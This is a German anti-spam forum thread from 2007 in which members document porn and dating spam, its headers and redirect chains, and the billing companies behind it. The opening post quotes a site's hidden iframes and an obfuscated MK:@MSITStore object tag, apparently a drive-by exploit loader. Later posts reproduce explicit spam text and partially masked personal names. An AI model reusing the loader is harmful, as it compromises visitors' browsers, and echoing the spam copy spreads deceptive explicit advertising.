35012.com wirft dieses aus:

<iframe src="http://35012.com/aaa/bbb/ad2.html" width="1" height="1" frameborder="0"></iframe>
<iframe src="http://35012.com/jqq/ad1.html" width="1" height="1" frameborder="0"></iframe>
<script src='http://s102.cnzz.com/stat.php?id=388380&web_id=388380' language='JavaScript' charset='gb2312'></script>
http://35012.com/jqq/ad1.html:

<html><TITLE>index</TITLE><BODY>
<OBJECT style="display:none" type="tex&#116&#47&#120&#45&#115&#99&#114iptlet" data="MK:@MSITSto&#114&#101&#58&#109&#104tml:c:\.mht&#33http://35012.com/jqq/ccc.html::/%6C%65%66t&#46htm"></OBJECT>
</body>
</html>
Was'n das?

kjz1
19.03.2007, 12:56
Heute wieder:

Received: from c90665cd.static.spo.virtua.com.br (EHLO we5.com.br) [201.6.101.205] by mx0.gmx.net (mx006) with SMTP; 19 Mar 2007 xx:xx:xx +0100

beworben wurde der übliche Porno-Schund:

http://in.beatengold.cc/de/index.html

was wieder auf unsere altbekannten 'Freunde' weiterleitet:

http://www.cybilling.com/anmeldung/lz_anmelden.php?WMID=71063&PID=2&PGID=180&LID=50064&AC=1&LGID=en

Man beachte auch die Webmaster-ID. Gehostet natürlich völlig schmerzbefreit bei Titan Networks. Wobei ich mich frage, wieso die bei Eco (http://www.eco.de/servlet/PB/menu/1024095/index.html) immer noch Mitglied sind.

- kjz

gation
19.03.2007, 16:11
weil eco jetzt zusammen mit der Bundesnetzagentur gegen Spam vorgehen will vielleicht?

Eniac
21.03.2007, 08:50
Bei mir auch auf einen baiting account. Was sagt eigentlich unser selbsternannter Jugendschützer zu solch einem Dreck?

----------------------------------------------------------------------------

Re: Static-IP-cr200716138.cable.net.co [200.71.61.38] (Ursprungsquelle der Spammail)
To: poor [at] spamvictim.tld

Re: http://in.beatengold.cc [218.188.64.134] (beworbene Müllseite)
To: poor [at] spamvictim.tld, poor [at] spamvictim.tld, poor [at] spamvictim.tld, support[at]webnic.cc, poor [at] spamvictim.tld

Return-Path: <weoztrwgh [at] cantv.net>
X-Flags: 1001
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail invoked by alias); 20 Mar 2007 xx:xx:xx -0000
Received: from Static-IP-cr200716138.cable.net.co (EHLO yoi.santotomas.edu.co) [200.71.61.38]
by mx0.gmx.net (mx063) with SMTP; 20 Mar 2007 xx:xx:xx +0100
Received: (qmail 21216 invoked by UID: [UID filtered]
Received: from 200.71.61.38 by yoi.santotomas.edu.co (envelope-from <weoztrwgh [at] cantv.net>, UID: [UID filtered]
(clamdscan: 0.88.4/1837. spamassassin: 3.0.2. perlscan: 1.25-st-qms.
Clear:RC:1(200.71.61.38):.
Processed in 5.835383 secs); 18 Mar 2007 xx:xx:xx -0000
X-Antivirus-MYDOMAIN-Mail-From: weoztrwgh [at] cantv.net via yoi.santotomas.edu.co
X-Antivirus-MYDOMAIN: 1.25-st-qms (Clear:RC:1(200.71.61.38):. Processed in 5.835383 secs Process 20843)
Received: from yoi.santotomas.edu.co (HELO 201-210-192-40.genericrev.cantv.net) (200.71.61.38)
by yoi.santotomas.edu.co with SMTP; 18 Mar 2007 xx:xx:xx -0500
Message-ID: [ID filtered]
From: "Manuel Buelck" <weoztrwgh [at] cantv.net>
To: "Christof" <poor [at] spamvictim.tld>
Subject: Christof, dies sind unglaubliche Videos
Date: Sun, 18 Mar 2007 xx:xx:xx -0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_1551_01C76953.049C4260"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 0 (Mail was not recognized as spam)
X-GMX-UID: [UID filtered]


Julia Hornig möchte zur Branchenindex

INZEST
Christof, kaum zu glauben, was in deutschen Haushalten abgeht.
<<< Videos hier >>> http://in.beatengold.cc/de/index.html


Eniac

gation
22.03.2007, 14:52
Was sagt eigentlich unser selbsternannter Jugendschützer zu solch einem Dreck?Soweit ich weiß erzählt man sich, dass der, den Du wohl mainzt, nicht das beste Verhältnis zu den Hamburgern hat. Die Gründe dafür (siehe jagin) haben aber nichts mit deren ekelhaftem Dreck zu tun, der ekelhaft ist, ob es als spam kommt oder nicht.
Die Hamburg-Köln-NL-Karibik-Connection gehört zu den Dingen, die ich mit aller Brutalität aus dem Internet löschen würde, wenn ich König von Deutschland und dem Rest der Onlinewelt wär ;)

Sebastian
22.03.2007, 15:37
:zen::goodgame:
Wird Zeit, die Monarchie wieder einzuführen. Gation 4 König :)

SCNR

BTW: Es lohnt sich, sich mit einer Spamtrap-Adresse "abzumelden". Die gesamten Domainnamen füllen eine gesamte Seite und auch die Formulierungen, die sie nutzen, um Filter zu umgehen kann man wiederum nutzen, um die Filter zu schärfen :D

Investi
22.03.2007, 15:51
Was sagt eigentlich unser selbsternannter Jugendschützer zu solch einem Dreck?


Welcher Dreck? Das schadet doch niemandem und einem 8-jährigen doch erst recht nicht.


Bei mir trotz tausendfacher "Austragung" jeden Tag mehrfach. Hat jemand die deutsche Anschrift dieser Unternehmung? Eine HR-Eintragung scheinen sie jedenfalls nicht zu haben. Wer ist eigentlich deren Steuerbevollmächtigter in Deutschland für die in Deutschland generierten und vereinnahmten Umsätze? Konnte dazu bisher leider noch keine Infos finden.
Laut Crefo gibt es bundesweit keine Fa. "Cyberservices ...".

gation
22.03.2007, 17:55
Hat jemand die deutsche Anschrift dieser Unternehmung? Diese Antwort ist so ernst gemeint, wie die Frage (?)
http://www.adult-webmaster-akademie.de/index.htm?docs/kontakt.htm~mainFrame
http://www.avnonline.com/index.php?Primary_Navigation=Editorial&Action=View_Article&Content_ID=105835


Bayr and his close friends Guido, Richard, and Michael founded Cytainment (http://www.cytainment.de, the precursor of Cyberservices, in Germany in 1996. Though all of the parties were running successful companies, they saw an even greater opportunity by combining the world's oldest trade - sex ? with the technologies of the future; namely, the Internet. The outgrowth of this would later come to be known as the Cyberservices conglomerate, encompassing an advertising agency, telephone call center, real estate office, and a software house.
"My friends at SEXMoney.com asked me if, down the road, I would be interested in joining the team. However, at that point, I was still too much involved in the time consuming project work of SAP-projects," Bayr says.
After seeing what could be accomplished within the European adult Internet market, Bayr felt he had no other choice but to join the Cyberservices team. "I think if I had problems getting motivated, I'd be in the wrong business anyway," says Bayr, a marketing major who received his Master's degree in business administration from a private Christian college near Santa Barbara, Calif.
In 1999, Bayr says, Cyberservices became the largest affiliate program within the German-speaking countries (Germany, Austria, and Switzerland) and today includes regional branches throughout Europe, with an estimated 25,000-30,000 customers.

Gerlach
05.04.2007, 23:30
Die Cytainment (http://www.cytainment.de/cytainment.htm) beglückt mal wieder mit:
Return-Path: <Dexter7387 [at] indiatimes.com>
Delivery-Date: Thu, 05 Apr 2007 xx:xx:xx +0200
Received-SPF: none (mxeu18: 208.47.133.246 is neither permitted nor denied by domain of indiatimes.com) client-ip=208.47.133.246; envelope-from=Dexter7387 [at] indiatimes.com; helo=franklin.mcdata.com;
Received: from [208.47.133.246] (helo=franklin.mcdata.com)
by mx.kundenserver.de (node=mxeu18) with ESMTP (Nemesis),
ID: [ID filtered]
Received: from 208.47.133.144 (testwww.mcdata.cn [208.47.133.144])
by franklin.mcdata.com (Postfix) with SMTP
ID: [ID filtered]
Message-ID: [ID filtered]
To: ???@???.de,
???@???.de, ???@???.de,
???@???.de
Cc: ???@???.de, ???@??.de,
???@???.de
From: "Carina Koenig" <Dexter7387 [at] indiatimes.com>
Subject: Re: Lerne heisse Singles aus Deiner Umgebung kennen
Date: Thu, 05 Apr 2007 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Dexter7387 [at] indiatimes.com
X-MimeOLE: Produced by Microsoft MimeOLE V5.00.3018.1300
Envelope-To: ???@???.de
Leitet wie gehabt weiter auf http://www1.cybilling.com/anmeldung/lz_anmelden.php
Beschwerde u.a. mal wieder an die Bundesnetzagentur aufgrund der beworbenen Rufnummer 0900 - 5 - 200130.

Für's Archiv ein anderer Erfahrungsbericht eines Betroffenen:
http://de.nntp2http.com/admin/net-abuse/mail/2006/07/c742eb3f66ec2648847cd7a77f2107da.html

gation
06.04.2007, 00:08
@Gerlach zur Frage in dem verlinkten beitrag, ob der Münchner Nummerninhaber S*K* schon bekannt ist:
Ja, ist er!
Er ist laut Selbstauskunft Produktmanager der heidelberger Firma Questnet
Das war früher der Dialerpartner der Cyberservices.
Interessante Kontakte in seinem Profil unter
https://www.xing.com/profile/St*_Ku*/

Damals dialerte man ja unter Angabe einer Adresse in Hürth
http://www.antispam-ev.de/forum/showthread.php?p=18173#post18173

für die Jüngeren unter uns:
robert-bosch-strasse 6 Hürth (http://www.google.de/search?hl=de&q=%22robert-bosch-strasse+6%22+h%C3%BCrth&btnG=Google-Suche&meta=)
--> http://personalsoftware.de/wr/impressum.php
(ehemals Robert-Bosch-Straße 6, Hürth)


Aufsichtsratsvorsitzender:
Mi* R*
Vorstand:
R* Schn*

siehe Cytainment Verwaltungs AG hamburg (http://handelsregister.abendblatt.de/index.php?tpl=hr_detail&hr_search_typ=bl_court&hr_bl=12&hr_court=153&hr_text=&hr_fd=6&hr_fm=4&hr_fy=1996&hr_ud=6&hr_um=4&hr_uy=2007&hr_typ=0&hr_firma=cytainment&hr_plz=&hr_fsitz=&hr_pre_regnr=&hr_regnr=&hr_action=1&hr_lk=&s_cc=true&s_sq=hamburgerabendblattdedev=%26pid%3DHamburger%2520Abendblatt%2520Online%2520-%2520Handelsregister%26pidt%3D1%26oid%3Dfunctiononclick%2528event%2529%257B%2520 %2520hr_Submit%2528%2529%253B%257D%26oidt%3D2%26ot%3DSUBMIT&POPUPCHECK=1175898170921&costart=&hr_id=388507)

Gründer der Gesellschaft, die sämtliche Aktien übernommen haben, sind: ...4) Schn*, R* Troisdorf; 5) R* Mi*, Köln. Der Aufsichtsrat besteht aus sechs Mitgliedern. Den ersten Aufsichtsrat bilden: ... R*, Mi*, Köln ... Schn*, R*, Trroisdorf ...

stephan
09.04.2007, 15:21
Vorsorgeuntersuchung in der Fickklinik

So könnte durchaus die nächste Überweisung vom Hausarzt lauten.
Die Wartezimmer der Fickklinik sind voll, wie überall in Deutschland!

http://www.eronews24.com/klinik

Gyno und Kliniksex direkt beim Oberarzt! Hier wird die Urinprobe noch vor Ort "getestet" und gerne zweckentfremdet. Auch Blasenkatheter werden bevorzugt. Dazu ausgiebige Einlaufsessions, inklusive persönlichem Test des Schließmuskels durch den Herrn Doktor.

http://www.eronews24.com/klinik

Vater treibt es mit der eigenen Tochter ein Skandal? Nein! Das versaute junge Ding bekommt es sonst zu wenig besorgt.

http://www.eronews24.com/inzest

Mütter geben Töchtern Sexnachhilfe. Endlich einmal richtig unterricht im geil per Hand wichsen...

http://www.eronews24.com/inzest

------------------------------Header----------------------

Return-Path: <klinik [at] eronews24.com>
...
Received: (qmail 6787 invoked by alias); 2 Apr 2007 xx:xx:xx -0000
Delivered-To: GMX delivery to meine.adresse
Received: (qmail invoked by alias); 02 Apr 2007 xx:xx:xx -0000
Received: from unknown (EHLO mail.eronews24.com) [67.55.93.214]
by mx0.gmx.net (mx065) with SMTP; 03 Apr 2007 xx:xx:xx +0200
Received: (qmail 86335 invoked by UID: [UID filtered]
To: meine.adresse
Subject: *SPAM* Vorsorgeuntersuchung in der F!ckklinik
Date: Mon, 2 Apr 2007 xx:xx:xx -0400
From: "Dr. Placebo" <klinik [at] eronews24.com>
Message-ID: [ID filtered]
X-Priority: 3
X-ID: [ID filtered]
X-Mailer: PHPMailer [version 1.72]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset="iso-8859-1"
X-GMX-Antispam: 0 (Mail was not recognized as spam)

gation
09.04.2007, 19:26
Für diesen Dreck machten die auch Werbung im Forum von "Jagin" - und zwar in einem öffentlichen Thread (aktuell nicht mehr). Obwohl die Seite in Berlin geschaltet ist, hält sich in Berlin keiner für zuständig.
Andererseits war die Werbung für den C*U-P0rnostar ja auch in allen medien... (google mal c*u, p0rno, berlin)

Gerlach
10.04.2007, 19:29
Während man einerseits meint, "Inge ist in der Kartei"


Return-Path: <doqolpiapp [at] malerfachbetrieb-heiko-elze.de>
Delivery-Date: Tue, 10 Apr 2007 xx:xx:xx +0200
Received-SPF: none (mxeu7: 221.127.158.140 is neither permitted nor denied by domain of malerfachbetrieb-heiko-elze.de) client-ip=221.127.158.140; envelope-from=doqolpiapp [at] malerfachbetrieb-heiko-elze.de; helo=malerfachbetrieb-heiko-elze.de;
Received: from [221.127.158.140] (helo=malerfachbetrieb-heiko-elze.de)
by mx.kundenserver.de (node=mxeu7) with ESMTP (Nemesis),
ID: [ID filtered]
Message-ID: [ID filtered]
Date: Tue, 10 Apr 2007 xx:xx:xx -0200
Reply-To: "Franz" <doqolpiapp [at] malerfachbetrieb-heiko-elze.de>
From: "Franz" <doqolpiapp [at] malerfachbetrieb-heiko-elze.de>
User-Agent: Mozilla 4.7 [en] (Win98; I)
MIME-Version: 1.0
To: "Bruno" <???@???.de>
Subject: Inge ist in der Kartei
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Envelope-To: ???@???.de
Was machst du so Bruno,

Schau mal bei http://skt.beatengold.cc rein. Dort findest Du sofort
Kontakt zu heissen Singles aus Deiner Umgebung oder zu einsamen
Ehefrauen, deren Männer viel unterwegs sind.

Auf http://skt.beatengold.cc geht die Post so richtig ab :-)

Gruss
Franz

was natürlich forward macht auf
http://www2.cybilling.com/anmeldung/lz_anmelden.php? (mit Parametern EFO=1&EMail=&Abschicken22=Passwort+anfordern&WMID=71063&PID=2&PGID=72&LID=49756&AC=1&LGID=de)

stellt man sich bei Cytainment (http://www.cytainment.de/cytainment.htm) erstmal dumm (so dumm, dass sie meinten, ich müsse Ihnen meine Kreditkartennummer mitteilen, bevor sie mein Anliegen - ja, ein T5F - beantworten könnten). Nicht dass ich es anders erwartet hätte.

blowfish
05.07.2007, 15:32
Heute bei mir aufgeschlagen
Return-Path: <heidi [at] teleweb.cc>
Received: from mailin16.aul.t-online.de (mailin16.aul.t-online.de [172.20.26.72]) by mhead07 with LMTP; Wed, 04 Jul 2007 xx:xx:xx +0200
X-Sieve: CMU Sieve 2.2
Received: from teleweb.cc ([81.31.44.68]) by mailin16.sul.t-online.de with esmtp ID: [ID filtered]
Received: from 10.0.8.33 by teleweb.cc with asmtp (Exim) ID: [ID filtered]
Message-ID: <00e001c5beb36e913280f9799752 [at] cz08.teleweb.cc>
Date: Wed, 4 Jul 2007 xx:xx:xx +0200
MIME-Version: 1.0
Subject: Das ist doch unfair
To: ***@t-online.de
From: "Heidi" <heidi [at] teleweb.cc>
X-TOI-VIRUSSCAN: clean
X-TOI-EXPURGATEID: 149288::070704183520-6E81BBB0-3A38B787/0-0/0-0
X-TOI-MSGID: 0515b5f1-0e6b-497f-91b3-d990ba4afa47
X-Seen: false
X-ENVELOPE-TO: <***@t-online.de>
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit


Das ist doch unfair Nein, normal ist das nicht, wenn man sich einen Vorteil bei der Damenwelt verschaffen kann! Und zwar einen Vorteil, der unsichtbar ist, aber hochwirksam. Wie schaffen es manche Kerle, jede in die Kiste zu kriegen? Wie schaffen es diese Burschen, immer im Mittelpunkt zu stehen? Warum werden die Weiber willig, sobald sie in die Nähe solcher Kerle kommen? Wir sprechen von Pheromonen! Diese unsichtbaren Duftstoffe haben einen Einfluss auf die Frauen, den die Wissenschaft gerade erst erforscht. Ist es im Tierreich schon lange bekannt, dass diese Duftstoffe eine nennenswerte Wirkung haben, so hat man erst in den letzten Jahren festgestellt, dass Menschen auch Pheromone wahrnehmen. Männer, die Pheromone abgeben, wirken auf die Damenwelt geradezu unwiderstehlich und kriegen jede ins Bett! Informieren Sie sich hier: http://www.teleweb.cc/?MID=105642 Vieles läuft über die Nase, dass wissen wir. Aber das es so heimlich sein kann und so einfach. Ein paar Sprühstöße von Flash-Instinct auf die Haut gebracht und man wird unsichtbar zum begehrenswerten Sex-Partner! Aber nicht jedes Pheromon wirkt so. Flash-Instinct hat die wirksame Kombination gefunden, die direkt zum Erfolg führt. Probieren Sie es aus: http://www.teleweb.cc/?MID=105642

und noch mal für die Crowler
heidi [at] teleweb.cc
heidi [at] teleweb.cc
heidi [at] teleweb.cc

Gerlach
25.07.2007, 10:34
Ich kriege diese Spams regelmäßig und werde sie mal wieder regelmäßiger hier einstellen:

Return-Path: <Bruno1858 [at] outgun.com>
Delivery-Date: Wed, 25 Jul 2007 xx:xx:xx +0200
Received-SPF: none (mxeu24: 125.242.9.140 is neither permitted nor denied by domain of outgun.com) client-ip=125.242.9.140; envelope-from=Bruno1858 [at] outgun.com; helo=proxy.test.co.kr;
Received: from [125.242.9.140] (helo=proxy.test.co.kr)
by mx.kundenserver.de (node=mxeu24) with ESMTP (Nemesis),
ID: [ID filtered]
Received: from 125.242.9.140 ([125.242.9.140])
by proxy.test.co.kr (8.11.6/8.11.6) with SMTP ID: [ID filtered]
Wed, 25 Jul 2007 xx:xx:xx +0900
Message-ID: [ID filtered]
To: ???@???.de, ???@???.de
Cc: ???@???.de, ???@???.de, ???@???.de
From: "Martin Mirken" <Bruno1858 [at] outgun.com>
Subject: Re: Lerne heisse Singles aus Deiner Umgebung kennen
Date: Wed, 25 Jul 2007 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Bruno1858 [at] outgun.com
X-Priority: 3
X-MSMail-Priority: Low
X-MimeOLE: Produced by Microsoft MimeOLE V5.00.2919.6600
Envelope-To: ???@???.deACHTUNG : EXTREMES HARDCORE MATERIAL
Sie müssen 18 Jahre oder älter sein um dieses email zu lessen

Extreme Sex Channels German Adult Dating Extreme TopModels

Diese Seite hier ist nichts mehr für schwache Nerven und sprengt jeden guten Rahmen der Sittlichkeit. Nur etwas für echte Sexprofis und Lustjunkies Schau Dich jetzt auf der grön, deutschsprachigen Kontaktdatenbank (Deutschland, Osterreich, Die Schweiz) um, denn hier findest Du die Frauen, die genau das gleiche suchen wie Du! Hardcore Casting ! Der Blick hinter die Kulissen. Extreme Fetischfotos und videos. Unsese Castings und Shootings sind die hefigsten

kostenlose Vorschau Weitere Profile ansehen Gratis Tour
http://www.onlinefeature.cc/de/index.html
http://skt.onlinefeature.cc/de/index.html
http://etm.onlinefeature.cc/de/index.html

Wenn Du diesen Newsletter nicht mehr erhalten möest, klicke einfach auf diesen Link:
http://skt.onlinefeature.cc/revoke.php

(Ort,Donnerstag,allein,Unternehmen,darf,Angaben,Mark,natürlich,hätten,meine,frei lich,Kilometer,Macht,Sicherheit,Ansicht,
genug,russischen,gestern,machte,Kunden,mal,natürlich,seine,Frankreich,sollen,
Ort,geführt,setzt,Deshalb,größten,wichtig,Ende,Sicherheit,Tage,bringen,oben,keit ,
hohen,Hauptstadt,hält,darüber,jede,zum,gehen,ob,die,Schon,Chef,bekommen,Leiter,F all,Seine,nehmen,genau,nämlich,eigenen,fast,hatte,aber,zugleich,Jahr,SPD,zeigen, neu,Ihr,Stunden,Dienstag,Weg,hatte,selbst,spielt,Ländern,Zwei,Kreis,
Selbst,stellte,Seit,solchen,dass,Den,Medien,dritten,dpa,Beispiel,mal,Minister,Vi ele,Frankfurt,können,innerhalb,Informationen,weitere,alle,
ändern,klar,zeigt,ja,teilte,Münchner,Sieg,erst,denen,Zwei,suchen,will,Männer,vie len,Meinung,unserer,
abend,erstmals,bin,gegenüber,ändern,gegeben,zu,Weg,wieder,Münchner,zugleich,ford erte,zumindest,Macht,Vergleich,Welt,etwa,Medien,Stuttgarter,genug,Zuschauer,
)Der Bundesnetzagentur teile ich dazu u.a. mit:
1. http://skt.onlinefeature.cc/de/index.html aufrufen (Achtung: pornografischer Inhalt)
2. In der Mitte auf "Jetzt Anmelden klicken"
3. wahllose E-Mail-Adresse eingeben, z.B. abc [at] defghijk.de und "Passwort anfordern", OK bestätigen
4. nun auf der eigentlichen Webseite http://www1.cybilling.com/anmeldung/lz_anmelden.php?EFO=1&EMail=abc%40defghijk.de&Abschicken22=Passwort+anfordern&WMID=71793&PID=1&PGID=164&LID=50023&AC=1&LGID=de angelangt den Knopf "LAN-/DSL-Zugang" drücken
--> jetzt wird man aufgefordert, die Rufnummer 09005200130157 zu wählen (die letzten drei Ziffern dienen nur dazu, den Anrufer zu identifizieren und varieren bei jedem Aufruf der Seite).

Diese glänzt mal wieder mit absoluter Untätigkeit. Immerhin gibt es ein Aktenzeichen: EB 111290

Die Wettbewerbszentrale hat nach der x-ten Zusendung nun doch ein Minimum an Bewegung gezeigt und die Sache an die Außenstelle Hamburg übergeben wo sie unter dem Aktenzeichen "B I/2007, Cytainment AG & Co. KG/Hamburg" bearbeitet wird. Wer noch Cytainment-Spam bekommt mag sich ja vielleicht auch an beide Beschwerdestellen wenden.

Sebastian
25.07.2007, 12:32
Das Pack ist übrigens das beste Beispiel, warum man Abmeldelinks NICHT anklicken soll.
Kannst ja mal eine spamfreie Adresse nehmen und dich mal "austragen"
http://www.webwatch.cc/a.php?adr= [hier emailadresse einfügen]

Du bekommst die Meldung, daß du aus dem "Newsletter" (den mal mal wieder nirgends bestellen kann, aber dafür abbestellen) ausgetragen bist und wirst fortan mit anderen Domains der Spammer auf die gleiche Domain bespammt. :clown:

Gerlach
26.07.2007, 11:17
Und ein frischer Header:

Return-Path: <devil2354 [at] indiatimes.com>
Delivery-Date: Thu, 26 Jul 2007 xx:xx:xx +0200
Received-SPF: pass (mxeu2: domain of indiatimes.com designates 203.199.93.226 as permitted sender) client-ip=203.199.93.226; envelope-from=devil2354 [at] indiatimes.com; helo=ipc603.indiatimes.com;
Received: from [203.199.93.226] (helo=ipc603.indiatimes.com)
by mx.kundenserver.de (node=mxeu2) with ESMTP (Nemesis),
ID: [ID filtered]
Received: from unknown (HELO 192.168.58.135) ([192.168.57.23])
by ipc603.indiatimes.com with SMTP; 26 Jul 2007 xx:xx:xx +0530
Message-ID: [ID filtered]
From: "devil2354"<devil2354 [at] indiatimes.com>
Full-Name: "devil2354"
To: <???@???.de>
CC: <???@???.de>
Reply-To: "devil2354"<devil2354 [at] indiatimes.com>
Subject: Fwd: Re: einem schnellen One- Night- Stand- ****** ( Experten pro)
Date: Thu, 26 Jul 2007 xx:xx:xx +0530
X-URL: http://indiatimes.com
Content-Type: text/plain; charset=us-ascii
Envelope-To: ???@???.de
http://skt.onlinefeature.cc/de/index.html

Natürlich wieder einziger möglicher Forward nach:
http://www2.cybilling.com/anmeldung/lz_anmelden.php

Gerlach
30.07.2007, 20:47
Und wieder:
Return-Path: <cliff6429 [at] indiatimes.com>
Delivery-Date: Mon, 30 Jul 2007 xx:xx:xx +0200
Received-SPF: pass (mxeu22: domain of indiatimes.com designates 203.199.93.15 as permitted sender) client-ip=203.199.93.15; envelope-from=cliff6429 [at] indiatimes.com; helo=smtp5.indiatimes.com;
Received: from [203.199.93.15] (helo=smtp5.indiatimes.com)
by mx.kundenserver.de (node=mxeu22) with ESMTP (Nemesis),
ID: [ID filtered]
Received: from 192.168.57.15 (a4 [192.168.57.73])
by smtp5.indiatimes.com (8.13.1/8.13.1) with SMTP ID: [ID filtered]
Tue, 31 Jul 2007 xx:xx:xx +0530
Message-ID: [ID filtered]
From: "cliff6429"<cliff6429 [at] indiatimes.com>
To: <???@???.de>
CC: <???@???.de>
Reply-To: "cliff6429"<cliff6429 [at] indiatimes.com>
Subject: Fwd: Lerne heisse Singles aus Deiner Umgebung kennen ( hier)
Date: Mon, 30 Jul 2007 xx:xx:xx +0530
X-URL: http://indiatimes.com
Content-Type: text/plain; charset=us-ascii
Envelope-To: ???@???.de

http://skt.onlinefeature.cc/de/index.html
http://www1.cybilling.com/anmeldung/lz_anmelden.php

Gerlach
02.08.2007, 18:58
Und wieder:
Return-Path: <Donnie9325 [at] indiatimes.com>
Delivery-Date: Thu, 02 Aug 2007 xx:xx:xx +0200
Received-SPF: softfail (mxeu23: transitioning domain of indiatimes.com does not designate 12.15.227.236 as permitted sender) client-ip=12.15.227.236; envelope-from=Donnie9325 [at] indiatimes.com; helo=mail.enabletrading.com;
Received: from [12.15.227.236] (helo=mail.enabletrading.com)
by mx.kundenserver.de (node=mxeu23) with ESMTP (Nemesis),
ID: [ID filtered]
Received: from ultra.edixchange.com ([209.67.27.134]) by mail.enabletrading.com with Microsoft SMTPSVC(6.0.3790.1830);
Thu, 2 Aug 2007 xx:xx:xx -0400
Received: from ultra.edixchange.com (ultra.edixchange.com [209.67.28.103])
by ultra.edixchange.com (8.8.8+Sun/8.8.8) with SMTP ID: [ID filtered]
Thu, 2 Aug 2007 xx:xx:xx -0400 (EDT)
Message-ID: [ID filtered]
To: ???@???.de, ???@???.de
Cc: ???@???.de, ???@???.de,
???@???.de, ???@???.de
From: "Martin Westhoff" <Donnie9325 [at] indiatimes.com>
Subject: Re: einem schnellen One- Night- Stand- ******
Date: Thu, 02 Aug 2007 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Donnie9325 [at] indiatimes.com
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Return-Path: Donnie9325 [at] indiatimes.com
X-OriginalArrivalTime: 02 Aug 2007 xx:xx:xx.0090 (UTC) FILETIME=[4A536720:01C7D523]
Envelope-To: ???@???.de
http://skt.onlinefeature.cc/de/index.html
http://www1.cybilling.com/anmeldung/lz_anmelden.php

Gerlach
04.08.2007, 07:10
Und die nächste:
Return-Path: <pleased8707 [at] indiatimes.com>
Delivery-Date: Sat, 04 Aug 2007 xx:xx:xx +0200
Received-SPF: pass (mxeu25: domain of indiatimes.com designates 203.199.93.226 as permitted sender) client-ip=203.199.93.226; envelope-from=pleased8707 [at] indiatimes.com; helo=ipc603.indiatimes.com;
Received: from [203.199.93.226] (helo=ipc603.indiatimes.com)
by mx.kundenserver.de (node=mxeu25) with ESMTP (Nemesis),
ID: [ID filtered]
Received: from unknown (HELO mb5.indiatimes.com) ([192.168.58.232])
by ipc603.indiatimes.com with ESMTP; 04 Aug 2007 xx:xx:xx +0530
Date: Sat, 4 Aug 2007 xx:xx:xx +0530 (IST)
From: pleased8707 [at] indiatimes.com
To: ???@???.de
Cc: ???@???.de
Message-ID: [ID filtered]
Subject: Du willst Heute noch realen Sex haben? ( aller bleibt)
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
X-Originating-IP: [127.0.0.1]
Envelope-To: ???@???.de

Rest wie gehabt.

antispam2006
05.08.2007, 15:20
Return-Path: <bounce[BOUNCE filtered]@mail.informiert-sein.com>
Received: from mail.informiert-sein.com (HELO mail.informiert-sein.com) [84.246.240.226]
From: "Extreme Videos" <vids [at] informiert-sein.com (vids [at] informiert-sein.com)>
List-Unsubscribe: <mailto:leave-list08-15V [at] mail.informiert-sein.com (leave-list08-15V [at] mail.informiert-sein.com)>
List-Subscribe: <mailto:subscribe-list15 [at] mail.informiert-sein.com (subscribe-list15 [at] mail.informiert-sein.com)>
List-Owner: <mailtowner-list15 [at] mail.informiert-sein.com (owner-list15 [at] mail.informiert-sein.com)>
Sender: bounce[BOUNCE filtered]@mail.informiert-sein.com (bounce[BOUNCE filtered]@mail.informiert-sein.com)




http://www.super24.info



http://84.246.240.226/u?id=0815V&c=F



Noch jemand von den Patienten beglückt worden? Man muss natürlich nicht erwähnen, das die Anmeldung zu Cyberservice führt...

Gerlach
07.08.2007, 18:01
Und wieder ...
Return-Path: <sink3017 [at] indiatimes.com>
Delivery-Date: Tue, 07 Aug 2007 xx:xx:xx +0200
Received-SPF: pass (mxeu18: domain of indiatimes.com designates 203.199.93.226 as permitted sender) client-ip=203.199.93.226; envelope-from=sink3017 [at] indiatimes.com; helo=ipc603.indiatimes.com;
Received: from [203.199.93.226] (helo=ipc603.indiatimes.com)
by mx.kundenserver.de (node=mxeu18) with ESMTP (Nemesis),
ID: [ID filtered]
Received: from unknown (HELO mb7.indiatimes.com) ([192.168.58.231])
by ipc603.indiatimes.com with ESMTP; 07 Aug 2007 xx:xx:xx +0530
Date: Tue, 7 Aug 2007 xx:xx:xx +0530 (IST)
From: sink3017 [at] indiatimes.com
To: ???@???.de
Cc: ???@???.de
Message-ID: [ID filtered]
Subject: einem schnellen One- Night- Stand- ****** ( Wenn)
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
X-Originating-IP: [127.0.0.1]
Envelope-To: ???@???.de

lilla
12.08.2007, 13:07
[provided4903 [at] indiatimes.com]

An:xxxxxxxxxx
Betreff:
Lerne heisse Singles aus Deiner Umgebung kennen ( ganze)
Datum: Sun, 12. Aug 2007 xx:xx:xx +5.500

N A M E : Leona, A L T E R : 33, B E R U F : Hausfrau

Na, mein Geiler!

Ist dir auch schon so heiss wie mir? Ich habe einfach die Nase voll, dass mein Mann nie zu Hause ist und mir meine Bedurfnisse nicht befriedigen kann. Jetzt bin ich gezwungen mir einen richtigen Lover zu suchen, der mich wieder mal so richtig durchbumst! Wenn du also mein Lover sein willst, egal ob fur eine Nacht oder fur Langzeitbeziehungen, ich bin fur beides zu haben!

Hol dir jetzt einfach einen Zugang fur 5 Euro, du findest mich mit dem Usernamen Leona33-allone, ich habe dort meine Heimadresse und meine Handynummer hinterlassen, melde dich bei mir und besuche mich, oder ich komme zu dir.
http://skt.netcompany.cc/de/index.html

Schau Dich jetzt auf der grossten, deutschsprachigen Kontaktdatenbank (Deutschland, Osterreich, Die Schweiz) um, denn hier findest Du die Frauen, die genau das gleiche suchen wie Du!

